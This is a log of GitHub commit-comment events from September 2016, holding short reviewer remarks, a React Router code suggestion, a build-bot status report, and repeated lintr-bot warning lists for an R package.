{"id":"4576887659","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"rrdesai/dsp"},"payload":{"comment":{"id":19061665,"position":null,"line":null,"path":null,"commit_id":"ceed6c78dda9f853eac185e039b9654731bd4424","created_at":"2016-09-16T23:34:18Z","updated_at":"2016-09-16T23:34:18Z","body":"RE: 05b-python_advanced.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @julialintern @galvin-mj\r\n\r\nHello @rrdesai \r\n\r\nGood job on the advanced Python problems!\r\n- Even though you haven't used regular expressions to solve Q1-4, you might want to review them, they come in handy sometimes!\r\n- Nice work with Pandas!\r\n\r\n👍 "}},"created_at":"2016-09-16T23:34:18Z"}
{"id":"4576893114","type":"CommitCommentEvent","actor":{"login":"NicMcPhee"},"repo":{"name":"dstelljes/container-project"},"payload":{"comment":{"id":19061685,"position":null,"line":null,"path":null,"commit_id":"a197ba931b37ecc24442b018e17c75636b3e7506","created_at":"2016-09-16T23:36:32Z","updated_at":"2016-09-16T23:36:32Z","body":"Nice addition – thanks."}},"created_at":"2016-09-16T23:36:32Z"}
{"id":"4576893122","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"amy-b/finalProject"},"payload":{"comment":{"id":19061686,"position":17,"line":17,"path":"index.html","commit_id":"460f5de1ee88377109bd03028b20f63f4736e6da","created_at":"2016-09-16T23:36:32Z","updated_at":"2016-09-16T23:36:32Z","body":"Hey Amy, sorry bout that...it rendered the HTML instead of displaying the text!"}},"created_at":"2016-09-16T23:36:32Z"}
{"id":"4576893439","type":"CommitCommentEvent","actor":{"login":"ryanflorence"},"repo":{"name":"ReactTraining/react-router"},"payload":{"comment":{"id":19061687,"position":null,"line":null,"path":null,"commit_id":"ab57fa8554e4d2efaeaf2dd0ab82ea6434bac5b5","created_at":"2016-09-16T23:36:41Z","updated_at":"2016-09-16T23:36:41Z","body":"In the DOM it needs to an `a` or else it's inaccessible, which we should discourage w/ our API.\r\n\r\nFor native, however:\r\n\r\n```js\r\nconst NativeLink = ({ to, activeStyle, style, ...rest }) => (\r\n  <Match pattern={to}>\r\n    {({ matched }) => (\r\n      <TouchableHighlight\r\n        style={matched ? { ...activeStyle, ...style } : style}\r\n        onPress={() => {\r\n          this.context.router.transitionTo(to)\r\n        }}\r\n        {...rest}\r\n      />\r\n    )}\r\n  </Match>\r\n)\r\n\r\nNativeLink.contextTypes = { router: React.PropTypes.object }\r\n```\r\n\r\nThis is really what `Link` should look like too."}},"created_at":"2016-09-16T23:36:41Z"}
{"id":"4576894118","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19061690,"position":null,"line":null,"path":null,"commit_id":"13627153888d3ac71645178a674491bc8151b8b6","created_at":"2016-09-16T23:36:58Z","updated_at":"2016-09-16T23:36:58Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1191 of 1191 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-13627153888d3ac71645178a674491bc8151b8b6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-13627153888d3ac71645178a674491bc8151b8b6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-13627153888d3ac71645178a674491bc8151b8b6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.11%25-green.svg)</a>\n"}},"created_at":"2016-09-16T23:36:58Z"}
{"id":"4576895035","type":"CommitCommentEvent","actor":{"login":"amy-b"},"repo":{"name":"amy-b/finalProject"},"payload":{"comment":{"id":19061693,"position":17,"line":17,"path":"index.html","commit_id":"460f5de1ee88377109bd03028b20f63f4736e6da","created_at":"2016-09-16T23:37:18Z","updated_at":"2016-09-16T23:37:18Z","body":"Haha, that's what I figured :)"}},"created_at":"2016-09-16T23:37:18Z"}
{"id":"4576896013","type":"CommitCommentEvent","actor":{"login":"amy-b"},"repo":{"name":"amy-b/finalProject"},"payload":{"comment":{"id":19061697,"position":17,"line":17,"path":"index.html","commit_id":"460f5de1ee88377109bd03028b20f63f4736e6da","created_at":"2016-09-16T23:37:41Z","updated_at":"2016-09-16T23:37:41Z","body":"Thank you!"}},"created_at":"2016-09-16T23:37:41Z"}
{"id":"4576896829","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"bwlewis/irlba"},"payload":{"comment":{"id":19061701,"position":null,"line":null,"path":null,"commit_id":"e1fb240b02ed84d2f23f61fc48bafb30073c0a9e","created_at":"2016-09-16T23:38:02Z","updated_at":"2016-09-16T23:38:02Z","body":"[R/eigen.R:57:10:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/eigen.R#L57) *warning:* **no visible global function definition for ‘irlba’**\n```r\n​    L <- irlba(x, n, ...)\n         ^~~~~\n```\n[R/eigen.R:60:8:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/eigen.R#L60) *warning:* **no visible global function definition for ‘irlba’**\n```r\n​  L <- irlba(x, n, ...)\n       ^~~~~\n```\n[R/eigen.R:68:8:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/eigen.R#L68) *warning:* **no visible global function definition for ‘irlba’**\n```r\n​  L <- irlba(x, n, shift=shift, ...)\n       ^~~~~\n```\n[R/irlba.R:260:5:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L260) *warning:* **local variable ‘algorithm’ assigned but may not be used**\n```r\n​    algorithm = \"svd\"\n    ^~~~~~~~~\n```\n[R/irlba.R:260:15:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L260) *style:* **Use <-, not =, for assignment.**\n```r\n​    algorithm = \"svd\"\n              ^\n```\n[R/irlba.R:292:14:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L292) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​      RND <- orthog(RND, v$v)\n             ^~~~~~\n```\n[R/irlba.R:293:30:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L293) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​      RV <- cbind(v$v, RND / norm2(RND))\n                             ^~~~~\n```\n[R/irlba.R:327:9:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L327) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      if(tol * ans$d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n        ^\n```\n[R/irlba.R:393:10:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L393) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​    F <- orthog(F, V[, 1:k])\n         ^~~~~~\n```\n[R/irlba.R:394:23:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L394) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​    V[, k + 1] <- F / norm2(F)\n                      ^~~~~\n```\n[R/irlba.R:416:26:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L416) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​      V[, 1] <- V[, 1] / norm2(V[, 1])\n                         ^~~~~\n```\n[R/irlba.R:448:40:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L448) *warning:* **no visible global function definition for ‘cross’, Did you mean 'class'?**\n```r\n​      W[, j_w] <- W[, j_w] - ds * drop(cross(dv, VJ)) * du\n                                       ^~~~~\n```\n[R/irlba.R:454:17:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L454) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​      W[, j] <- orthog (W[, j, drop=FALSE], W[, 1:(j - 1), drop=FALSE])\n                ^~~~~~\n```\n[R/irlba.R:457:10:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L457) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​    S <- norm2(W[, j_w, drop=FALSE])\n         ^~~~~\n```\n[R/irlba.R:463:32:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L463) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​      if (w_dim > 1) W[, j] <- orthog(W[, j], W[, 1:(j - 1)])\n                               ^~~~~~\n```\n[R/irlba.R:464:30:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L464) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​      W[, j_w] <- W[, j_w] / norm2(W[, j_w])\n                             ^~~~~\n```\n[R/irlba.R:484:12:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L484) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​      F <- orthog(F, V[, 1:j, drop=FALSE])\n           ^~~~~~\n```\n[R/irlba.R:487:14:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L487) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​        R <- norm2(F)\n             ^~~~~\n```\n[R/irlba.R:492:16:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L492) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​          F <- orthog(F, V[, 1:j, drop=FALSE])\n               ^~~~~~\n```\n[R/irlba.R:493:29:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L493) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​          V[, j + 1] <- F / norm2(F)\n                            ^~~~~\n```\n[R/irlba.R:523:48:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L523) *warning:* **no visible global function definition for ‘cross’, Did you mean 'class'?**\n```r\n​          W[, jp1_w] <- W[, jp1_w] - ds * drop(cross(dv, VJP1)) * du\n                                               ^~~~~\n```\n[R/irlba.R:530:48:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L530) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​        if (reorth && w_dim > 1) W[, j + 1] <- orthog(W[, j + 1], W[, 1:j])\n                                               ^~~~~~\n```\n[R/irlba.R:531:14:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L531) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​        S <- norm2(W[, jp1_w])\n             ^~~~~\n```\n[R/irlba.R:536:40:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L536) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​          if (w_dim > 1) W[, j + 1] <- orthog(W[, j + 1], W[, 1:j])\n                                       ^~~~~~\n```\n[R/irlba.R:537:38:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L537) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​          W[, jp1_w] <- W[, jp1_w] / norm2(W[, jp1_w])\n                                     ^~~~~\n```\n[R/irlba.R:557:12:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L557) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​    R_F <- norm2(F)\n           ^~~~~\n```\n[R/irlba.R:620:5:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L620) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(tol * d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n    ^\n```\n[R/prcomp.R:84:16:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/prcomp.R#L84) *warning:* **no visible binding for global variable ‘irlba’**\n```r\n​  s <- do.call(irlba, args=args)\n               ^~~~~\n```\n[R/utility.R:19:13:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/utility.R#L19) *warning:* **no visible global function definition for ‘cross’, Did you mean 'class'?**\n```r\n​  drop(sqrt(cross(x)))\n            ^~~~~\n```\n[tests/edge.R:30:19:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/tests/edge.R#L30) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​for (tol in 10 ^ -(7:12))\n                  ^\n```"}},"created_at":"2016-09-16T23:38:02Z"}
{"id":"4576897179","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"bwlewis/irlba"},"payload":{"comment":{"id":19061703,"position":null,"line":null,"path":null,"commit_id":"e1fb240b02ed84d2f23f61fc48bafb30073c0a9e","created_at":"2016-09-16T23:38:10Z","updated_at":"2016-09-16T23:38:10Z","body":"[R/eigen.R:57:10:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/eigen.R#L57) *warning:* **no visible global function definition for ‘irlba’**\n```r\n​    L <- irlba(x, n, ...)\n         ^~~~~\n```\n[R/eigen.R:60:8:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/eigen.R#L60) *warning:* **no visible global function definition for ‘irlba’**\n```r\n​  L <- irlba(x, n, ...)\n       ^~~~~\n```\n[R/eigen.R:68:8:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/eigen.R#L68) *warning:* **no visible global function definition for ‘irlba’**\n```r\n​  L <- irlba(x, n, shift=shift, ...)\n       ^~~~~\n```\n[R/irlba.R:260:5:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L260) *warning:* **local variable ‘algorithm’ assigned but may not be used**\n```r\n​    algorithm = \"svd\"\n    ^~~~~~~~~\n```\n[R/irlba.R:260:15:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L260) *style:* **Use <-, not =, for assignment.**\n```r\n​    algorithm = \"svd\"\n              ^\n```\n[R/irlba.R:292:14:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L292) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​      RND <- orthog(RND, v$v)\n             ^~~~~~\n```\n[R/irlba.R:293:30:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L293) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​      RV <- cbind(v$v, RND / norm2(RND))\n                             ^~~~~\n```\n[R/irlba.R:327:9:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L327) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      if(tol * ans$d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n        ^\n```\n[R/irlba.R:393:10:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L393) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​    F <- orthog(F, V[, 1:k])\n         ^~~~~~\n```\n[R/irlba.R:394:23:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L394) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​    V[, k + 1] <- F / norm2(F)\n                      ^~~~~\n```\n[R/irlba.R:416:26:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L416) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​      V[, 1] <- V[, 1] / norm2(V[, 1])\n                         ^~~~~\n```\n[R/irlba.R:448:40:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L448) *warning:* **no visible global function definition for ‘cross’, Did you mean 'class'?**\n```r\n​      W[, j_w] <- W[, j_w] - ds * drop(cross(dv, VJ)) * du\n                                       ^~~~~\n```\n[R/irlba.R:454:17:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L454) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​      W[, j] <- orthog (W[, j, drop=FALSE], W[, 1:(j - 1), drop=FALSE])\n                ^~~~~~\n```\n[R/irlba.R:457:10:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L457) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​    S <- norm2(W[, j_w, drop=FALSE])\n         ^~~~~\n```\n[R/irlba.R:463:32:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L463) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​      if (w_dim > 1) W[, j] <- orthog(W[, j], W[, 1:(j - 1)])\n                               ^~~~~~\n```\n[R/irlba.R:464:30:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L464) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​      W[, j_w] <- W[, j_w] / norm2(W[, j_w])\n                             ^~~~~\n```\n[R/irlba.R:484:12:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L484) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​      F <- orthog(F, V[, 1:j, drop=FALSE])\n           ^~~~~~\n```\n[R/irlba.R:487:14:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L487) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​        R <- norm2(F)\n             ^~~~~\n```\n[R/irlba.R:492:16:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L492) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​          F <- orthog(F, V[, 1:j, drop=FALSE])\n               ^~~~~~\n```\n[R/irlba.R:493:29:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L493) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​          V[, j + 1] <- F / norm2(F)\n                            ^~~~~\n```\n[R/irlba.R:523:48:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L523) *warning:* **no visible global function definition for ‘cross’, Did you mean 'class'?**\n```r\n​          W[, jp1_w] <- W[, jp1_w] - ds * drop(cross(dv, VJP1)) * du\n                                               ^~~~~\n```\n[R/irlba.R:530:48:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L530) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​        if (reorth && w_dim > 1) W[, j + 1] <- orthog(W[, j + 1], W[, 1:j])\n                                               ^~~~~~\n```\n[R/irlba.R:531:14:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L531) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​        S <- norm2(W[, jp1_w])\n             ^~~~~\n```\n[R/irlba.R:536:40:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L536) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​          if (w_dim > 1) W[, j + 1] <- orthog(W[, j + 1], W[, 1:j])\n                                       ^~~~~~\n```\n[R/irlba.R:537:38:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L537) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​          W[, jp1_w] <- W[, jp1_w] / norm2(W[, jp1_w])\n                                     ^~~~~\n```\n[R/irlba.R:557:12:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L557) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​    R_F <- norm2(F)\n           ^~~~~\n```\n[R/irlba.R:620:5:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L620) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(tol * d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n    ^\n```\n[R/prcomp.R:84:16:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/prcomp.R#L84) *warning:* **no visible binding for global variable ‘irlba’**\n```r\n​  s <- do.call(irlba, args=args)\n               ^~~~~\n```\n[R/utility.R:19:13:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/utility.R#L19) *warning:* **no visible global function definition for ‘cross’, Did you mean 'class'?**\n```r\n​  drop(sqrt(cross(x)))\n            ^~~~~\n```\n[tests/edge.R:30:19:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/tests/edge.R#L30) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​for (tol in 10 ^ -(7:12))\n                  ^\n```"}},"created_at":"2016-09-16T23:38:10Z"}
{"id":"4576898290","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"bwlewis/irlba"},"payload":{"comment":{"id":19061705,"position":null,"line":null,"path":null,"commit_id":"e1fb240b02ed84d2f23f61fc48bafb30073c0a9e","created_at":"2016-09-16T23:38:38Z","updated_at":"2016-09-16T23:38:38Z","body":"[R/eigen.R:57:10:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/eigen.R#L57) *warning:* **no visible global function definition for ‘irlba’**\n```r\n​    L <- irlba(x, n, ...)\n         ^~~~~\n```\n[R/eigen.R:60:8:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/eigen.R#L60) *warning:* **no visible global function definition for ‘irlba’**\n```r\n​  L <- irlba(x, n, ...)\n       ^~~~~\n```\n[R/eigen.R:68:8:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/eigen.R#L68) *warning:* **no visible global function definition for ‘irlba’**\n```r\n​  L <- irlba(x, n, shift=shift, ...)\n       ^~~~~\n```\n[R/irlba.R:260:5:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L260) *warning:* **local variable ‘algorithm’ assigned but may not be used**\n```r\n​    algorithm = \"svd\"\n    ^~~~~~~~~\n```\n[R/irlba.R:260:15:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L260) *style:* **Use <-, not =, for assignment.**\n```r\n​    algorithm = \"svd\"\n              ^\n```\n[R/irlba.R:292:14:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L292) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​      RND <- orthog(RND, v$v)\n             ^~~~~~\n```\n[R/irlba.R:293:30:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L293) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​      RV <- cbind(v$v, RND / norm2(RND))\n                             ^~~~~\n```\n[R/irlba.R:327:9:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L327) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      if(tol * ans$d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n        ^\n```\n[R/irlba.R:393:10:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L393) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​    F <- orthog(F, V[, 1:k])\n         ^~~~~~\n```\n[R/irlba.R:394:23:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L394) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​    V[, k + 1] <- F / norm2(F)\n                      ^~~~~\n```\n[R/irlba.R:416:26:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L416) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​      V[, 1] <- V[, 1] / norm2(V[, 1])\n                         ^~~~~\n```\n[R/irlba.R:448:40:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L448) *warning:* **no visible global function definition for ‘cross’, Did you mean 'class'?**\n```r\n​      W[, j_w] <- W[, j_w] - ds * drop(cross(dv, VJ)) * du\n                                       ^~~~~\n```\n[R/irlba.R:454:17:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L454) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​      W[, j] <- orthog (W[, j, drop=FALSE], W[, 1:(j - 1), drop=FALSE])\n                ^~~~~~\n```\n[R/irlba.R:457:10:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L457) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​    S <- norm2(W[, j_w, drop=FALSE])\n         ^~~~~\n```\n[R/irlba.R:463:32:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L463) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​      if (w_dim > 1) W[, j] <- orthog(W[, j], W[, 1:(j - 1)])\n                               ^~~~~~\n```\n[R/irlba.R:464:30:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L464) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​      W[, j_w] <- W[, j_w] / norm2(W[, j_w])\n                             ^~~~~\n```\n[R/irlba.R:484:12:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L484) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​      F <- orthog(F, V[, 1:j, drop=FALSE])\n           ^~~~~~\n```\n[R/irlba.R:487:14:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L487) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​        R <- norm2(F)\n             ^~~~~\n```\n[R/irlba.R:492:16:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L492) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​          F <- orthog(F, V[, 1:j, drop=FALSE])\n               ^~~~~~\n```\n[R/irlba.R:493:29:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L493) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​          V[, j + 1] <- F / norm2(F)\n                            ^~~~~\n```\n[R/irlba.R:523:48:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L523) *warning:* **no visible global function definition for ‘cross’, Did you mean 'class'?**\n```r\n​          W[, jp1_w] <- W[, jp1_w] - ds * drop(cross(dv, VJP1)) * du\n                                               ^~~~~\n```\n[R/irlba.R:530:48:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L530) 